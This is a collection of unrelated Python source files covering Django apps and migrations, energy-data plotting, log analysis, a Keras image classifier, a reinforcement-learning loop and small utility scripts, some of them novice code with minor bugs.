# draw(3, log_img(f_shift_h), 'ILPF滤波后频率域')
# draw(4, log_img(img_h), 'ILPF滤波后空间域')
# plt.savefig('Fzu_shutong_L_ideal_lowpass.jpg')
# plt.show()
draw = draw_picture(1, 2)
plt.figure(figsize=(10, 3))
fh, h = filters.ringing_effect(d0=3)
draw(1, log_img(fh), '频率域滤波器')
draw(2, log_img(h), '空间域滤波器')
# without log_img: TypeError: Image data of dtype complex128 cannot be converted to float
plt.savefig('boy_L_ringing_effect.jpg')
plt.show()
if __name__ == "__main__":
main()
"""
振铃现象:
与滤波器H大小、截止频率d0均有关联
当d0较小(个位数)方能观察到,本图片里当d0=3最为明显
振铃现象处理的图片有较大扭曲变形
"""
|
21,914 | 9aa89372d7184f18830188625920656a1b90aa3b | # Generated by Django 2.2.8 on 2020-02-19 14:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('client', '0027_remove_client_verification_code_verified'),
]
operations = [
migrations.CreateModel(
name='TempClientUpload',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('salutation', models.CharField(max_length=20)),
('first_name', models.CharField(max_length=50)),
('middle_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('dob', models.CharField(max_length=50)),
('phone_no', models.CharField(max_length=30)),
('relationship', models.CharField(max_length=30)),
('gender', models.CharField(max_length=30)),
('premium', models.CharField(max_length=50)),
('state_id', models.CharField(max_length=150)),
('national_id', models.CharField(max_length=150)),
('passport', models.CharField(max_length=150)),
('staff_id', models.CharField(max_length=150)),
('voter_id', models.CharField(max_length=150)),
('secondary_phone_no', models.CharField(max_length=150)),
('lga', models.CharField(max_length=150)),
('provider', models.CharField(max_length=150)),
],
),
]
|
21,915 | a11c201c74ac4d8b284edc4c25fc7999ace3060a | from setuptools import setup
with open('requirements.txt') as f:
requirements = f.read().splitlines()
setup(
name='dynamicimage',
version='0.1',
install_requires=requirements,
packages=['dynamicimage'],
url='',
license='MIT',
author='Rick Wu',
author_email='',
description=''
)
|
21,916 | 3bd4b7f2179f146ca68e23b0b4d82e24ac9a6085 | n = int(input())
lists = [int(input()) for x in range(n)]
target = int(input())
first = lists[0]
final_list = []
for i in range(1,len(lists)):
if first + lists[i] == target:
final_list.append(first)
final_list.append(lists[i])
|
21,917 | ce7da2d2f6500f3741003a037e121f9456efc068 |
# coding: utf-8
# In[1]:
import pandas as pd
import matplotlib.pyplot as plt
get_ipython().magic(u'matplotlib inline')
data = pd.read_csv('log.csv')
#print list(data.columns.values)
ss = data[['@timestamp','real_region_name','ip']].sort('@timestamp')
from dateutil import parser
date = parser.parse('2015-03-16T07:36:50.935Z')
ip_list = dict()
ip = 0
ip_list[date] = list()
unique_ip = dict()
uip_set = set()
att_day = dict()
att_c = 0
for x in ss.itertuples():
if date.day < parser.parse(x[1]).day or date.month < parser.parse(x[1]).month: #cambio de día
#print date
unique_ip[(date)] = len(uip_set)
att_day[parser.parse("%s-%s"%(date.month,date.day))] = att_c
att_c = 0
#print len(uip_set)
date = parser.parse(x[1])
ip_list[(date)] = list()
else:
att_c = att_c + 1
if x[3] != ip: #cambio de ip
if ip != 0:
ip_list[date].append(ip)
uip_set.add(ip)
ip = x[3]
# print x[3]
attd_lc = [(k, v) for k,v in att_day.iteritems()]
ip_lc = [(k, len(v)) for k,v in ip_list.iteritems()]
uip_lc = [(k, v) for k,v in unique_ip.iteritems()] # Acumulado
uip_lc = sorted(uip_lc)
uip_lc_delta = list()
for i in range(len(uip_lc)):
if i != 0:
delta = uip_lc[i][1] - uip_lc[i-1][1]
uip_lc_delta.append((uip_lc[i][0],delta))
else:
uip_lc_delta.append((uip_lc[i][0], 0))
df = pd.DataFrame(sorted(ip_lc))
df.plot(kind='bar', legend=False, title='# Unique IP per day', alpha=0.5,)
df1 = pd.DataFrame(sorted(uip_lc))
df1.plot(kind='bar', legend=False, title='# Agregate New Unique of IP per day', alpha=0.5,)
df2 = pd.DataFrame(sorted(uip_lc_delta))
df2.plot(kind='bar', legend=False, title='# New of IP per day')
df3 = pd.DataFrame(sorted(attd_lc))
df3.plot(kind='bar', legend=False, title='# Attack per day')
att_uipd = [((x[1]+0.0)/(614+0.0), (y[1]+0.0)/(19+0.0)) for x,y in zip(sorted(attd_lc),sorted(uip_lc_delta))]
df4 = pd.DataFrame(att_uipd)
df4.columns = ['att','uip']
df4.plot( legend=True, title='# Attack vs New IP',alpha=0.5)
plt.show()
#print df4.corr
#print df2
#data[['@timestamp']] = parser.parse(data[['@timestamp']])
# Growth in attacks vs Growth botnet
# IP -- Num of requests
# OS, Browser, Request type, User_agent
# In[7]:
# Growth in attacks vs Growth botnet
# df4.max()
import scipy.stats
plt.matshow(df4.corr())
print df4['att'].corr(df4['uip'])
print df4['att'].corr(df4['uip'], method='spearman')
# IP -- Num of requests
# OS, Browser, Request type, User_agent
# In[131]:
list(sorted(attd_lc))[:][1]
# In[ ]:
|
21,918 | 41b34e3ecd9c2f9c1953189feae2eb06bb6b8730 | import numpy as np
from timeit import default_timer as timer
from utils import RefreshScreen
from metrics import Metrics
from time import sleep
SCREEN_REFRESH_COUNT = 20
SCREEN_REFRESH_COUNT_EPOCHS = 50
def Train(envWrapper, agent, verbose=True, headerText=""):
print(headerText)
episodicMetrics = []
globalStart = timer()
for i in np.arange(agent.maxEpisodes):
epoch = 0
frames = []
done = False
totalReward = 0
state = envWrapper.Reset()
# Console update for progress on # completed rollouts
if (not verbose) and i % (agent.maxEpisodes / SCREEN_REFRESH_COUNT) == 0:
print(f"------------ {i/agent.maxEpisodes: .2f}% -----------")
start = timer()
while not done and epoch < agent.maxEpochs:
# Observe change in env
action = agent.GetAction(state)
nextState, reward, done, _ = envWrapper.Step(action)
# TODO: [expmt] try spacing these out?
# Update agent model
agent.SaveExperience(state=state, action=action, reward=reward, nextState=nextState, done=done)
agent.Update()
# Updates related to env
epoch += 1
state = nextState
totalReward += reward
frames.append({
'frame': envWrapper.Render(),
'state': state,
'action': action,
'reward': reward})
# Console update for individual rollout progress
if verbose and epoch % (agent.maxEpochs / SCREEN_REFRESH_COUNT_EPOCHS) == 0:
RefreshScreen(mode="human")
qv = agent.GetValue(state, action)
print(headerText)
print(f"Training\ne={i}\nr={np.max(reward): 0.2f}\nq={qv: .2f}")
metrics = Metrics(frames, epoch, timer() - start, totalReward, done)
episodicMetrics.append(metrics)
return episodicMetrics, timer() - globalStart
def Test(envWrapper, agent, verbose=True, headerText=""):
print(headerText)
episodicMetrics = []
globalStart = timer()
for i in np.arange(agent.maxEpisodes):
epoch = 0
totalReward = 0
frames = []
done = False
state = envWrapper.Reset()
# Console update for progress on # completed rollouts
if (not verbose) and i % (agent.maxEpisodes / SCREEN_REFRESH_COUNT) == 0:
print(f"------------ {i/agent.maxEpisodes: .2f}% -----------")
start = timer()
while not done and epoch < agent.maxEpochs:
# Observe env and conduct policy
action = agent.GetBestAction(state)
nextState, reward, done, _ = envWrapper.Step(action)
epoch += 1
state = nextState
totalReward += reward
frames.append({
'frame': envWrapper.Render(),
'state': state,
'action': action,
'reward': reward})
if verbose and epoch % (agent.maxEpochs / SCREEN_REFRESH_COUNT_EPOCHS) == 0:
RefreshScreen(mode="human")
qv = agent.GetValue(state, action)
print(headerText)
print(f"Testing\ne={i}\nr={np.max(reward): 0.2f}\nq={qv: .2f}")
metrics = Metrics(frames, epoch, timer() - start, totalReward, done)
episodicMetrics.append(metrics)
return episodicMetrics, timer() - globalStart
|
21,919 | a58a1145c236db31f64625f57cceb9da180e3310 | import requests
from bs4 import BeautifulSoup, Comment
import HTMLParser
class FakeEmailGenerator:
url = None
def __init__(self, url = None):
self.url = "http://www.fakemailgenerator.com/"
def doGet(self):
infoResponse = requests.get(self.url)
return infoResponse
def getNewEmail(self):
response = self.doGet()
soup = BeautifulSoup(response.text, "html.parser")
domain = soup.find(id="domain").text
email = soup.find(id="home-email")["value"]
return email.strip() + domain.strip()
if __name__ == "__main__":
emailGen = FakeEmailGenerator()
print emailGen.getNewEmail()
|
21,920 | 8adc5d9306f69f158a7ecb44f41320fb43b5a7e0 | from laravel.Foundation.Bus.ShouldQueue import ShouldQueue
from laravel.Foundation.Events.Dispatchable import Dispatchable
import asyncio
class Dispatcher():
def __init__(self, app):
self.app = app
self.queueResolver = None
self.listeners = {}
def listen(self, events, listener):
if isinstance(events, str):
self.__listenOne(events, listener)
if isinstance(events, list):
self.__listenMany(events, listener)
def __listenOne(self, event, listener):
if event not in self.listeners.keys():
self.listeners[event] = []
self.listeners[event].append(self.makeListener(listener))
def __listenMany(self, events, listener):
for event in events:
if event not in self.listeners.keys():
self.listeners[event] = []
self.listeners[event].append(self.makeListener(listener))
def makeListener(self, listener):
if isinstance(listener, str):
return self.createClassListener(listener)
return listener
def createClassListener(self, listener):
from laravel.Helps.Help import app, tap
async def closure(payload):
listenerObj = tap(self.app.make(listener), self.setPayload(payload))
if isinstance(listenerObj, ShouldQueue):
return await app('bus').dispatch(listenerObj)
return await getattr(listenerObj, 'handle')(payload)
return closure
def setPayload(self, payload):
def closure(obj):
obj.payload = payload
return closure
async def dispatch(self, event, parameters={}, returnExceptions=False):
eventName, payload = self.parseEventAndPayload(event, parameters)
if eventName in self.listeners.keys():
tasks = [asyncio.create_task(self.createCoro(listener, payload)) for listener in self.listeners[eventName]]
return (asyncio.gather(*tasks, return_exceptions=returnExceptions), tasks)
async def createCoro(self, listener, payload):
return await listener(payload)
def parseEventAndPayload(self, event, parameters):
if isinstance(event, Dispatchable):
return (event.eventName, event.payload)
return (event, parameters)
|
21,921 | 6cbc3275d2c540d742914646e0f687085e4b0b1e | #!/usr/bin/env python
# -*- coding: utf-8 -*-
VERSION = (2, 0, 6)
__version__ = '.'.join(str(num) for num in VERSION)
|
21,922 | d9637ae226f7caf41608d4d0c85390a3ad571535 | from django.shortcuts import render
from django.http import HttpResponse
from .models import Item
from django.template import loader
# Create your views here.
def index(request):
item_list=Item.objects.all()
context={
'item_list':item_list,
}
return render(request,'food/index.html',context)
def item(request):
return HttpResponse('best up ')
def detail(request,item_id):
item = Item.objects.get(pk=item_id)
context={
'item_b':item_b,
}
return render(request,'food/detail.html',context)
|
21,923 | 682d43d9a8700a14744f79e2e719a01a18d84dd8 | #101th prb
n1,h1=map(int,input().split(' '))
print(n1%(10**h1))
|
21,924 | db8c083e0f585aed3dcbf879cf3d5c8ba668adb9 | # CTI-110 P2HW1 - Celsius Fahrenheit Converter
# Convert celsius to fahrenheit temperatures
# Lacey Dunn
# 06/11/2018
# ask for input in celsius
celsius=float(input("Enter the temperature in celcius:"))
# convert using formula
fahrenheit=(celsius*9.0/5.0)+32
# print results
print("Degrees in Fahrenheit:", fahrenheit)
|
21,925 | 72246bfd094da21017f7fc40a5900b797e8273fc | from argparse import ArgumentParser
from os import path
import os
import re
from matplotlib.backends.backend_agg import FigureCanvasAgg
from calcsim import CalcSimWrapper
from datastore import InputDatastore
from expercomparison import ComparisonEngine
import numpy as np
import dmplots
aparser = ArgumentParser(description='Searches for the optimum vacancy concentration multiplier')
aparser.add_argument('--inputdata', metavar='DIR', type=str, required=True,
help='Directory containing input data')
aparser.add_argument('--outputdir', metavar='DIR', type=str, default='.',
help='Directory to stash the output results (plots, tables etc.)')
aparser.add_argument('--dataprefix', metavar='PREFIX', type=str, default='NiCu',
help='Prefix to data files')
aparser.add_argument('--temperature', type=float, default=973,
help='Temperature in K')
args = aparser.parse_args()
accelcs = CalcSimWrapper()
dstore = InputDatastore(args.inputdata, args.dataprefix)
x = np.linspace(0, 25, num=100)
init_cond = np.ones(100)
init_cond[50:] = 0
dt = 0.05
ndt = int(2 * 60 * 60 / 0.05)
dx = 25e-6 / 100
def quicksim(z, cvf, I, exper, direction):
ce = ComparisonEngine(accelcs)
if direction == 'reverse':
I = -np.abs(I)
else:
I = np.abs(I)
diffusivity = dstore.interpolated_diffusivity(10001, args.temperature, precise=True)
resistivity = dstore.interpolated_resistivity(10001, args.temperature)
r = accelcs.emigration_factor(z, I * 100 * 100, args.temperature)
simd = accelcs.calc_simulation(diffusivity, resistivity, init_cond, ndt, dt, dx, r, cvf)
lsq, shift = ce.calibrate(simd, exper)
shifted_simd = ce.shift_data(simd)
return shifted_simd, lsq
def find_nearest(array, value):
idx = (np.abs(array - value)).argmin()
return array[idx], idx
#http://stackoverflow.com/questions/4494404/find-large-number-of-consecutive-values-fulfilling-condition-in-a-numpy-array
def contiguous_regions(condition):
"""Finds contiguous True regions of the boolean array "condition". Returns
a 2D array where the first column is the start index of the region and the
second column is the end index."""
# Find the indicies of changes in "condition"
d = np.diff(condition)
idx, = d.nonzero()
# We need to start things after the change in "condition". Therefore,
# we'll shift the index by 1 to the right.
idx += 1
if condition[0]:
# If the start of condition is True prepend a 0
idx = np.r_[0, idx]
if condition[-1]:
# If the end of condition is True, append the length of the array
idx = np.r_[idx, condition.size] # Edit
# Reshape the result into two columns
idx.shape = (-1,2)
return idx
#OK, get the data out of outputdir
fresults = {}
rresults = {}
results = {'forward': fresults, 'reverse': rresults}
zrange = np.genfromtxt(path.join(args.outputdir, 'zrange.csv'), delimiter=',')
cvfrange = np.genfromtxt(path.join(args.outputdir, 'cvfrange.csv'), delimiter=',')
files = [path.join(args.outputdir, f) for f in os.listdir(args.outputdir)
if path.isfile(path.join(args.outputdir, f))]
forwardfiles = [f for f in files if f.endswith('forward.csv')]
reversefiles = [f for f in files if f.endswith('reverse.csv')]
rx = r'.*Searchmap_I([\-0-9\.]+)_.*.csv'
for f in forwardfiles:
print(str.format('Processing {}', f))
I = int(float(re.match(rx, f).groups()[0]))
fresults[I] = np.genfromtxt(f, skip_header=0, delimiter=',')
for f in reversefiles:
print(str.format('Processing {}', f))
I = np.abs(int(float(re.match(rx, f).groups()[0])))
rresults[I] = np.genfromtxt(f, skip_header=0, delimiter=',')
#now, find average z* for forward case
fzaverage = 0
ict = 0
zvalues = []
cresults = {}
#multiply forward/reverse maps to get current-min maps
for I in fresults.keys():
combined_map = fresults[I] * rresults[I]
cresults[I] = combined_map
if I == 0:
continue
min_indicies = np.unravel_index(combined_map.argmin(), combined_map.shape)
min_z = zrange[min_indicies[0]]
print(str.format('Combined z* for I = {}: {}', I, min_z))
zvalues.append(min_z)
fzaverage = np.array(zvalues).mean()
print(str.format('Average z*: {}', fzaverage))
zaverage_rounded, zaverage_index = find_nearest(zrange, fzaverage)
print(str.format('Rounding to {}', zaverage_rounded))
#find (min, best, max) cvf at zaverage_rounded for each I
cbounds = {}
for I in cresults.keys():
bounds_column = cresults[I][zaverage_index, :]
bounds_truth = bounds_column < 0.005
contig_idxs = contiguous_regions(bounds_truth)
contig_sizes = contig_idxs[:, 1] - contig_idxs[:, 0]
contig_largest_idx = contig_sizes.argmax()
contig_bounds = bounds_column[contig_idxs[contig_largest_idx, 0]: contig_idxs[contig_largest_idx, 1]]
bounds_min = cvfrange[contig_idxs[contig_largest_idx][0]]
bounds_max = cvfrange[contig_idxs[contig_largest_idx][1] - 1]
bounds_best = cvfrange[bounds_column.argmin()]
assert(bounds_column.argmin() >= contig_idxs[contig_largest_idx][0])
assert(bounds_column.argmin() <= contig_idxs[contig_largest_idx][1])
print(str.format('I = {}, min, max, best = {}, {}, {}', I, bounds_min, bounds_max, bounds_best))
cbounds[I] = bounds_best - bounds_min, bounds_best, bounds_max - bounds_best
#now plot with error bars
I_plot = np.array([b for b in cbounds.keys()])
cvf_plot_list = []
for I in I_plot:
cvf_plot_list.append(cbounds[I][1])
cvf_plot = np.array(cvf_plot_list)
ebars_list_lower = []
ebars_list_upper = []
for I in I_plot:
ebars_list_lower.append(cbounds[I][0])
ebars_list_upper.append(cbounds[I][2])
ebars = np.array([ebars_list_lower, ebars_list_upper])
plot_data = np.column_stack((I_plot, cvf_plot))
outfile = path.join(args.outputdir, 'cvfplot_combined.png')
print(I_plot)
print(ebars)
dmplots.plot_cvf_function_ebars(plot_data, ebars, 'combined', outfile)
#and politely output simulations
for direction in ('forward', 'reverse'):
for I in cresults.keys():
for idx, edge in ((0, 'lower'), (1, 'best'), (2, 'upper')):
outfile = path.join(args.outputdir, str.format('Comparison_I{}_{}_{}bound.png', I, direction, edge))
cvf = cbounds[I][1]
if idx == 0:
cvf -= cbounds[I][idx]
elif idx == 2:
cvf += cbounds[I][idx]
print('using cvf = ' + str(cvf))
edict = dstore.edict_for_direction(direction)
exper = dstore.interpolated_experiment_dict(x, edict)[I]
simd, lsq = quicksim(zaverage_rounded, cvf, I, exper, direction)
simd = np.column_stack((x, simd))
exper = np.column_stack((x, exper))
f = dmplots.plot_sim_fit(simd, exper, I, zaverage_rounded, cvf, direction)
c = FigureCanvasAgg(f)
c.print_figure(outfile)
|
21,926 | dbb9b02dfe74c3a22b4bd133615c2d1dea1dd22d | # Artemtic opertos
#
print("Addition is a :",50+6)
print("subtractio is a :",50-6)
print("50*6 is a :",50*6)
print("50**6 is a :",50**6)
print("50/6 is a :",50/6)
print("50//6 is a :",50//6)
# assignmment Opertors
x=7
print(x)
x%7
print(x)
# Comparsision Operators
#
i=4
print(" Not Equal :",i!=5)
i=40
print(" Less Equal:",i>=50)
i=4
print(" Greater Equal:",i<=5)
i=5
print(" Equal:",i==5)
# membership opertors
list = [2,8,5,8,81,3,5,58,60,60]
print(22 in list)
print(2220 is not list)
# Bitwise opertors
# 0=00
# 1=01
# 2=10
# 3=11
print(0&1)
print(0|1)
|
21,927 | a13b6b81cd9fda39300b57359e0556db29045c90 | # _*_ encoding:utf-8 _*_
from __future__ import unicode_literals
from django.db import models
from datetime import datetime
from clients.models import Clients,District
from commodities.models import FactoryToCommodity,Charge,RelateCharge
# Create your models here.
class Documents_tr(models.Model):
document_id = models.CharField(max_length=30, verbose_name=u"单据号")
classify = models.CharField(choices=(("sale", u"销货"), ("return", u"退货")), default="sale", max_length=10)
merchant = models.ForeignKey(FactoryToCommodity, verbose_name=u"商品",null=True,blank=True)
charge = models.CharField(max_length=10, verbose_name=u"商品价格")
sale_nums = models.CharField(max_length=10,verbose_name=u"数量")
salessums = models.CharField(max_length=10,verbose_name=u"销售总价")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Documents(models.Model):
client = models.ForeignKey(Clients,verbose_name=u"客户")
district = models.ForeignKey(District,default='', verbose_name=u"乡镇")
document_id = models.CharField(max_length=30,verbose_name=u"单据号")
money = models.CharField(max_length=10,verbose_name=u"总金额")
payback = models.CharField(max_length=10,verbose_name=u"还款",null=True,blank=True)
ownmoney = models.CharField(max_length=10,verbose_name=u"销售欠款",null=True,blank=True)
remark = models.CharField(max_length=300,default='',verbose_name=u"备注",null=True,blank=True)
add_time = models.DateField(default=datetime.today, verbose_name=u"添加时间")
class Meta:
verbose_name = u"单据"
verbose_name_plural = verbose_name
|
21,928 | 216b0f667bfbbb3c78263778a1ed7ebe26da55d3 | import pandas as pd
import numpy as np
from get_data import *
from clean_text import *
from tweet_analyser.treatment_algorithms.text_blob_treatement import text_blob_treatement
from tweet_analyser.treatment_algorithms.vader_treatment import vader_treatment
from tweet_analyser.treatment_algorithms.naive_bayes import simple_bayes_treatment
from tweet_analyser.treatment_algorithms.regression_neural_network import regression_neural_network_treatment
from tweet_analyser.graphics.visualize_data import graph_matrice
from tweet_analyser.graphics.ROC import compute_ROC_AUC
from tweet_analyser.graphics.model_score import show_score
datasets_names = ['film_tweets', 'general_tweets', 'brand_tweets']
clean_text_names = ['stop_word_list_light', 'stop_word_list_normal', 'stop_word_list_heavy', 'lemmatize']
def apply_clean_text(df, f):
df_copy = df.copy()
df_copy.Text = df_copy.Text.apply(f)
return df_copy
treatments_names = ['text_blob', 'vader', 'naive_bayes', 'neural_network']
graphics = ["ROC", "visualize_data"]
|
21,929 | 8738067139f2edf611dc93820fb29483fc82a130 | NLP_FRAMEWORK_IP='10.89.100.14'
|
21,930 | 33c14a712c695d7c98ba3761b1580d3cb9c26af1 |
from googleapiclient.discovery import build
def google_search(search_term, api_key, cse_id, **kwargs):
service = build("customsearch", "v1", developerKey=api_key)
res = service.cse().list(q=search_term, cx=cse_id, **kwargs).execute()
#return res['items']
return res
sampleUrl = '''
https://www.everystudent.com/features/know-God.html
https://www.youtube.com/watch?v=pgmiPXAwiLg
https://www.huffingtonpost.com/steve-mcswain/how-to-find-god-the-five-_b_4660375.html
https://www.ted.com/talks/anjali_kumar_my_failed_mission_to_find_god_and_what_i_found_instead?language=en
https://www.beliefnet.com/faiths/galleries/8-signs-god-is-trying-to-get-your-attention.aspx
https://en.wikipedia.org/wiki/3_Acts_of_God
https://www.imdb.com/title/tt3455338/
https://thelife.com/dont-know-how
https://www.amazon.com/Just-Do-Something-Liberating-Approach/dp/0802458386
https://www.desiringgod.org/articles/why-are-so-many-christians-unhappy
https://en.wikipedia.org/wiki/Theism
https://en.wikipedia.org/wiki/Deism
'''
|
21,931 | 0126c34a746f516ce96b6b4b839ce8126264f2d0 | import re
from itertools import combinations
root = "C:/Users/aiden/Dropbox/git/adventofcode/"
lines = [l.rstrip('\n') for l in open(root + 'day25_input.txt', 'r').readlines()]
flatten = lambda t: [item for sublist in t for item in sublist]
lines = open(root + 'day25_input.txt', 'r').read().split("\n\n")
def encrypt(base, loop):
val = 1
for i in range(loop):
val *= base
val = val % 20201227
return val
def decrypt(base, target):
val = 1
i = 1
while True:
val *= base
val = val % 20201227
if val == target:
break
i += 1
return i
card_loop = encrypt(8790390, decrypt(7, 18499292))
encrypt(18499292, decrypt(7, 8790390)) |
21,932 | e6d89cec848d9ed6239e705071bf40a6b6d8fe1e | #!/usr/bin/env python
# coding: utf-8
# # Energy Generation
# Imporing libraries
# In[1]:
from entsoe import EntsoePandasClient
import pandas as pd
from plotly.offline import iplot, init_notebook_mode
init_notebook_mode()
import plotly.graph_objs as go
import plotly.figure_factory as ff
# Belgum solar data
# In[29]:
client = EntsoePandasClient(api_key='#######################')
start = pd.Timestamp('20171201', tz='Europe/Brussels')
end = pd.Timestamp('20180701', tz='Europe/Brussels')
country_code = 'BE' # Belgium
# total energy generation
belgium=client.query_generation(country_code, start=start,end=end, psr_type=None)
# In[30]:
belgium.tail(10)
# In[31]:
trace0=go.Scatter(x=belgium.index,y=belgium['Wind Onshore'],name='Onshore Wind')
trace1=go.Scatter(x=belgium.index,y=belgium['Solar'],name='Solar')
data=[trace0,trace1]
layout={'title':'Belgum Wind energy VS Solar Energy, 2017-2018',
'xaxis':{'title':'Date'},
'yaxis':{'title':'Energy Generation'}}
iplot({'data':data,'layout':layout})
#
# ## Energy Generation Forcast
# In[4]:
client = EntsoePandasClient(api_key='205f80f0-55c9-48aa-bd82-d603c4900119')
start = pd.Timestamp('20171201', tz='Europe/Brussels')
end = pd.Timestamp('20180201', tz='Europe/Brussels')
country_code = 'NO' # Norway
# total energy generation
norway=client.query_generation_forecast(country_code, start=start,end=end)
# In[10]:
norway.head()
# In[11]:
trace1=go.Scatter(x=norway.index,y=norway,name='Solar')
data=[trace1]
layout={'title':'Norway Energy Forcast',
'xaxis':{'title':'Date'},
'yaxis':{'title':'Energy Generation'}}
iplot({'data':data,'layout':layout})
# In[ ]:
|
21,933 | 200d77412eb3d240387f1e74c0f622fd49dcc6ca | def sortByHeight(a):
one = []
b = []
for i,k in enumerate(a):
if k == -1:
one.append(i)
else:
b.append(k)
b.sort()
for i in one: b.insert(i, -1)
return b
a = [-1, 150, 190, 170, -1, -1, 160, 180]
print(sortByHeight(a)) |
21,934 | 11dc41571636b31c4bf6250a512e57276a7cc539 | import keras
from keras.models import Model
from keras import backend as K
import matplotlib.pyplot as plt
import h5py
from keras.callbacks import ModelCheckpoint,ReduceLROnPlateau,TensorBoard
from sklearn.model_selection import train_test_split
from sklearn.utils import class_weight
from keras.preprocessing.image import ImageDataGenerator
import numpy as np
import pickle
# find class weight
def calculating_class_weights(y_true):
from sklearn.utils.class_weight import compute_class_weight
number_dim = np.shape(y_true)[1]
weights = np.empty([number_dim, 2])
for i in range(number_dim):
weights[i] = compute_class_weight('balanced', [0.,1.], y_true[:, i])
return weights
def get_weighted_loss(weights):
def weighted_loss(y_true, y_pred):
return K.mean((weights[:,0]**(1-y_true))*(weights[:,1]**(y_true))*K.binary_crossentropy(y_true, y_pred), axis=-1)
return weighted_loss
#%%
print(K.image_data_format())
model_name = 'downclass1'
data_name = 'traintest3'
filepath='weights/%s.hdf5'%(model_name)
tensorboard = TensorBoard(log_dir='./logs/downclass1', histogram_freq=0,batch_size=128)
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=5, min_lr=1e-5)
checkpoint = ModelCheckpoint('weights/%s.{epoch:02d}-{val_loss:.2f}.hdf5'%(model_name), monitor='val_loss', verbose=0, save_best_only=True, mode='min')
callbacks_list = [checkpoint,tensorboard]#,reduce_lr]
#%%
batch_size = 4
num_classes = 4
epochs = 150
img_size = 256
input_shape = (img_size, img_size, 3)
#%% load test
hf = h5py.File('dataset/%s.h5'%(data_name), 'r')
print(list(hf.keys()))
hf.close()
#%%
with h5py.File('dataset/%s.h5'%(data_name), 'r') as f:
x_train = f['x_train'][()]
x_test = f['x_test'][()]
y_train = f['y_train'][()]
y_test = f['y_test'][()]
#%% simple model
images = keras.layers.Input(input_shape)
shortcut1 = keras.layers.Conv2D(filters=64, kernel_size=(1, 1), padding="same")(images)
net = keras.layers.Conv2D(filters=64, kernel_size=(3, 3), padding="same")(images)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.Conv2D(filters=64, kernel_size=(3, 3), padding="same")(net)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.MaxPooling2D()(net)
net = keras.layers.Conv2D(filters=128, kernel_size=(3, 3), padding="same")(net)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.Conv2D(filters=128, kernel_size=(3, 3), padding="same")(net)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.MaxPooling2D()(net)
net = keras.layers.Conv2D(filters=256, kernel_size=(3, 3), padding="same")(net)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.Conv2D(filters=256, kernel_size=(3, 3), padding="same")(net)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.Conv2D(filters=256, kernel_size=(3, 3), padding="same")(net)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.Conv2DTranspose(filters=256, kernel_size=(3, 3),strides=(2,2), padding="same")(net)
net = keras.layers.Conv2DTranspose(filters=256, kernel_size=(3, 3),strides=(2,2), padding="same")(net)
net = keras.layers.concatenate([net,shortcut1], axis=-1)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.Conv2D(filters=512, kernel_size=(3, 3), padding="same")(net)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.AveragePooling2D((256,256))(net)
net = keras.layers.Flatten()(net)
net = keras.layers.Dense(units=num_classes,activation="sigmoid")(net)
model = keras.Model(inputs=images,outputs=net)
model.summary()
#%%
optimizer = keras.optimizers.Adadelta()
class_weights= calculating_class_weights(y_train)
model.compile(optimizer= optimizer,
loss = get_weighted_loss(class_weights)
)
model.summary()
print(class_weights)
# In[10]:
x_train = x_train/255.0
x_test = x_test/255.0
print(x_train.min(),x_train.max())
print(x_test.min(),x_test.max())
print(y_train.sum(axis=0))
print(y_test.sum(axis=0))
#%%
history = model.fit(x_train, y_train,
batch_size=4,
epochs=epochs,
validation_data = (x_test, y_test),
callbacks=callbacks_list,
verbose=1
)
with open('weights/%s.pickle'%(model_name), 'wb') as file_pi:
pickle.dump(history.history, file_pi)
#%%
|
21,935 | a8e19d4e19429b872eb3c2816a17faee19a3d486 | from django.shortcuts import render, redirect
from django.contrib.sites.shortcuts import get_current_site
from intern.reg_no_generator import reg_no_generator
from intern.pdfGenerator import generate_pdf
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.core.mail import send_mail, get_connection
from django.contrib import messages
from intern.forms import *
from intern.models import *
import datetime
from django.utils import timezone
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template import Context
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth import login, authenticate
from django.contrib.auth.models import User
from django.utils.encoding import force_text, force_bytes
from django.utils.http import urlsafe_base64_decode, urlsafe_base64_encode
from django.template.loader import render_to_string
from django.http import HttpResponse
from wsgiref.util import FileWrapper
import csv, os
from django.conf import settings
from django.contrib.auth.decorators import login_required
from account.decorators import *
from intern.decorators import *
from account import models as a_models
def intern_home(request):
return render(request,'intern/intern_home.html')
def intern_field(request):
return render(request, 'intern/field_intern.html')
@login_required
def create_profile(request):
if request.method == 'POST':
form = intern_data_form(request.POST, request.FILES)
if form.is_valid():
finalform=form.save(commit=False)
finalform.user = request.user
finalform.save()
return redirect('account:activities')
else:
form = intern_data_form()
return render(request,'intern/create_profile.html',{'form':form})
@login_required
@is_profile_created
def pdf_download(request):
p = profile.objects.get(user= request.user)
file = p.resume
response = HttpResponse(FileWrapper(file), content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename=resume.pdf'
return response
@login_required
@is_profile_created
@is_intern_data_created
def apply_intern(request, intern_choice):
try:
intern_choice = str(intern_choice)
except ValueError:
raise Http404
intern_object = intern_code.objects.get(code = intern_choice)
try:
if intern_registration.objects.filter(user = request.user, code = intern_choice).count()>0:
messages.error(request, 'You have already applied for '+intern_object.intern)
return redirect('account:activities')
except intern_registration.DoesNotExist:
pass
regno = reg_no_generator()
intern_registration_object = intern_registration(user = request.user, code = intern_object, reg_no=regno)
